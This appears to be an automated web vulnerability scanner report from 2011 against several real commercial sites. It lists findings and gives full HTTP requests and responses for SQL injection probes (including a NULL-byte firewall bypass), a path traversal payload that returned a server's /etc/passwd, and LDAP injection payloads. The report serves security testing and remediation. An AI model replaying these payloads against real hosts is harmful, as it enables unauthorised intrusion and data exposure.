20.5. http://googleads.g.doubleclick.net/pagead/ads

20.6. http://googleads.g.doubleclick.net/pagead/ads

20.7. http://pub.retailer-amazon.net/banner_120_600_b.php

20.8. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

20.9. https://secure.lifelock.com/enrollment

20.10. https://secure.lifelock.com/portal/login

20.11. http://www.hotelclub.com/common/adRevresda.asp

20.12. http://www.hotelclub.com/common/adRevresda.asp

20.13. http://www.identityguard.com/gscc.aspx

20.14. http://www.identityguard.com/ipages/le4/letp30daysfree1.html

20.15. http://www.lifelock.com/about/leadership/management/

20.16. http://www.lifelock.com/about/lifelock-in-the-community/

20.17. http://www.lifelock.com/guarantee/

20.18. http://www.lifelock.com/how-it-works/

20.19. http://www.lifelock.com/identity-theft/

20.20. http://www.lifelock.com/offers/faces/female/

20.21. http://www.nextadvisor.com/favicon.ico

20.22. https://www.pcisecuritystandards.org/

20.23. http://www.securepaynet.net/default.aspx

20.24. https://www.trustedid.com/registration.php

20.25. https://www.trustedid.com/suzeidprotector/

21. TRACE method is enabled

21.1. http://2byto.com/

21.2. http://affiliate.idgtracker.com/

21.3. http://analytic.hotelclub.com/

21.4. http://bh.contextweb.com/

21.5. http://bp.specificclick.net/

21.6. http://i35.tinypic.com/

21.7. https://secure.identityguard.com/

21.8. https://secure.lifelock.com/

21.9. http://widgets.digg.com/

21.10. http://www.nextadvisor.com/

21.11. http://www.simpatie.ro/

22. Email addresses disclosed

22.1. http://kroogy.com/search/js/ColorPicker2.js

22.2. http://kroogy.com/search/js/prototype.lite.js

22.3. http://www.hotelclub.com/Common/Scripts/s_code_HC.js

22.4. http://www.lifelock.com/about/leadership/management/

22.5. http://www.lifelock.com/about/lifelock-in-the-community/

22.6. http://www.lifelock.com/guarantee/

22.7. http://www.lifelock.com/how-it-works/

22.8. http://www.lifelock.com/identity-theft/

22.9. http://www.lifelock.com/scripts/jquery.colorbox.min.js

22.10. http://www.lifelock.com/scripts/lifelock.js

22.11. http://www.nextadvisor.com/includes/javascript.php

22.12. http://www.nextadvisor.com/includes/javascript.php

22.13. http://www.nextadvisor.com/includes/javascript.php

22.14. https://www.pcisecuritystandards.org/

22.15. https://www.pcisecuritystandards.org/js/jquery.cookie.js

23. Credit card numbers disclosed

24. Robots.txt file

24.1. http://2byto.com/bluepixel/cnt-gif1x1.php

24.2. http://ad.amgdgt.com/ads/

24.3. http://ad.doubleclick.net/ad/N5047.adwords.google.com/B4529920.12

24.4. http://affiliate.idgtracker.com/rd/r.php

24.5. http://ajax.googleapis.com/ajax/services/feed/load

24.6. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

24.7. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

24.8. http://at.amgdgt.com/ads/

24.9. http://b.scorecardresearch.com/p

24.10. http://b.voicefive.com/b

24.11. http://clients1.google.com/complete/search

24.12. http://clk.atdmt.com/go/253732016/direct

24.13. http://cm.g.doubleclick.net/pixel

24.14. http://data.coremetrics.com/cm

24.15. http://ec.atdmt.com/ds/5RTLCLFLKLFL/v132_lockman/v132_lockman_v3_LockManSSCard_160x600.swf

24.16. http://es.optimost.com/es/633/c/2/u/live.js

24.17. http://evintl-aia.verisign.com/EVIntl2006.cer

24.18. http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif

24.19. http://fls.doubleclick.net/activityi

24.20. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1047949563/

24.21. http://i35.tinypic.com/vx4ox.jpg

24.22. http://img.securepaynet.net/image.aspx

24.23. http://img1.wsimg.com/rcc/portraittemplates/img_resell_model_m2.jpg

24.24. http://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js

24.25. http://leadback.netseer.com/dsatserving2/servlet/pixel

24.26. http://media.compete.com/downblouse.de_uv_460.png

24.27. http://pagead2.googlesyndication.com/pagead/gen_204

24.28. http://partners.nextadnetwork.com/tracking/js.html

24.29. http://pixel.mathtag.com/event/img

24.30. http://s0.2mdn.net/3095006/mpcs_040111_160x600_gm_android_1_fl.swf

24.31. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYsv4CILb-AioFNb8AAAMyBTK_AAAH

24.32. http://safebrowsing.clients.google.com/safebrowsing/downloads

24.33. https://secure.identityguard.com/EnrollmentStep1

24.34. http://spe.atdmt.com/ds/5RTLCLFLKLFL/v120_myidmylife/v120_myidmylife_v3_job_728x90.swf

24.35. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

24.36. http://toolbarqueries.clients.google.com/tbproxy/af/query

24.37. http://tools.google.com/service/update2

24.38. http://tracking.keywordmax.com/tracking/show.php

24.39. http://widgets.digg.com/buttons/count

24.40. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

24.41. http://www.dictof.com/

24.42. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

24.43. http://www.equifax.com/siteUnavailableCorp.html

24.44. http://www.google-analytics.com/__utm.gif

24.45. http://www.google.com/coop/cse/brand

24.46. http://www.googleadservices.com/pagead/conversion/1047949563/

24.47. http://www.hostingcatalog.com/1x1s.gif

24.48. http://www.hotelclub.com/HCRefreshAshx/HttpCombiner.ashx

24.49. http://www.identityguard.com/gscc.aspx

24.50. http://www.keywordmax.com/tracking/show.php

24.51. http://www.kqzyfj.com/click-1911961-10751987

24.52. http://www.lifelock.com/about/lifelock-in-the-community/

24.53. http://www.nextadvisor.com/pmid/

24.54. http://www.securepaynet.net/default.aspx

24.55. http://www.tqlkg.com/image-1911961-10775457

24.56. https://www.trustedid.com/idfide01/

25. Cacheable HTTPS response

25.1. https://www.pcisecuritystandards.org/

25.2. https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf

25.3. https://www.pcisecuritystandards.org/favicon.ico

26. HTML does not specify charset

26.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15

26.2. http://breathe.c3metrics.com/c3realview.js

26.3. http://fls.doubleclick.net/activityi

26.4. http://kroogy.com/favicon.ico

26.5. http://kroogy.com/index/livesearch&q=s&type=web

26.6. http://kroogy.com/index/livesearch&q=si&type=web

26.7. http://kroogy.com/index/livesearch&q=sit&type=web

26.8. http://kroogy.com/index/livesearch&q=site&type=web

26.9. http://kroogy.com/index/livesearch&q=site:&type=web

26.10. http://kroogy.com/pub/banner_728_90_random.php

26.11. http://kroogy.com/search/images/blank.gif

26.12. http://kroogy.com/search/random.php

26.13. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471

26.14. http://pub.retailer-amazon.net/banner_120_600_a.php

26.15. http://pub.retailer-amazon.net/banner_120_600_b.php

26.16. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

26.17. http://www.hotelclub.com/blank.htm

26.18. http://www.hotelclub.com/common/adRevresda.asp

26.19. http://www.identityguard.com/ipages/le4/styles/ie.css

26.20. http://www.nextadvisor.com/includes/javascript.php

26.21. http://www.nextadvisor.com/link.php

27. Content type incorrectly stated

27.1. http://ar.voicefive.com/b/rc.pli

27.2. http://b2p.imgsrc.ru/b/blubberattack/1/16692341HbK.jpg

27.3. http://b2p.imgsrc.ru/b/blubberattack/8/13414178bpL.jpg

27.4. http://breathe.c3metrics.com/c3realview.js

27.5. http://event.adxpose.com/event.flow

27.6. http://evintl-aia.verisign.com/EVIntl2006.cer

27.7. http://img1.wsimg.com/rcc/portraittemplates/img_resell_model_m2.jpg

27.8. http://sales.liveperson.net/hcp/html/mTag.js

27.9. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

27.10. http://www.dictof.com/favicon.ico

27.11. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg

27.12. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg

27.13. http://www.nextadvisor.com/images/phonepowerlogo.gif

27.14. http://www.nextadvisor.com/includes/javascript.php

27.15. http://www.nextadvisor.com/link.php

27.16. https://www.pcisecuritystandards.org/favicon.ico

1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://analytic.hotelclub.com
Path:   /b/ss/flairviewhcprod/1/H.17/s84063693960197

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/flairviewhcprod%00'/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA09858516231B-400001A4A00530FD&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 12:33:17 GMT
Server: Omniture DC/2.0.0
Content-Length: 420
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/flairviewhcprod was not found on this server.</
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/flairviewhcprod%00''/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA09858516231B-400001A4A00530FD&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 12:33:17 GMT
Server: Omniture DC/2.0.0
xserver: www432
Content-Length: 0
Content-Type: text/html


1.2. http://www.hotelclub.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
ntCoent-Length: 15330
Content-Type: text/html; Charset=windows-1252
Expires: Sun, 24 Apr 2011 13:12:24 GMT
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:25 GMT
Connection: close
Set-Cookie: anon=47837466001520110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCQRQCTQ=EJPPCPBAEFOGKJENLHANBPKN; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 15330


<html>
<head>


<title>Under Maintenance</title>
<meta name=robots content=noindex,nofollow>
<meta name='DCSext.er' content="500;100"/>


<link rel="stylesheet" id="main-css" href="/Pri
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232749
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 13:13:26 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: AffiliateLogID=%2D1963682291; expires=Mon, 23-May-2011 14:00:00 GMT; path=/
Set-Cookie: anon=58210390806120110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQSSAQDRQ=GADPBCECLCOALKJPEFJPNLOE; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273c45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

1.3. http://www.nextadvisor.com/link.php [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1'; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:20:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 51922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...
</strong> Affordable web host for intermediate users, though installation problems; no domain privacy and advertising on error pages are drawbacks</div>
...[SNIP]...

Request 2

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1''; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:20:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 41061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...

2. File path traversal

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The script parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ../../../../../../../../../../proc/cpuinfo../../../../../../../../etc/passwd was submitted in the script parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, or by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /includes/javascript.php?script=../../../../../../../../../../proc/cpuinfo../../../../../../../../etc/passwd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:06:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 1830

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL
...[SNIP]...

3. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 6b8420a4611b3464)(sn=* and 6b8420a4611b3464)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /bmx3/broker.pli?pid=6b8420a4611b3464)(sn=*&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_6b8420a4611b3464&#41;&#40;sn=exp=1&initExp=Sun Apr 24 12:09:53 2011&recExp=Sun Apr 24 12:09:53 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646993; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=6b8420a4611b3464)!(sn=*&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_6b8420a4611b3464&#41;!&#40;sn=exp=1&initExp=Sun Apr 24 12:09:53 2011&recExp=Sun Apr 24 12:09:53 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646993; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

4. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.trustedid.com
Path:   /js/prototype.js

Issue detail

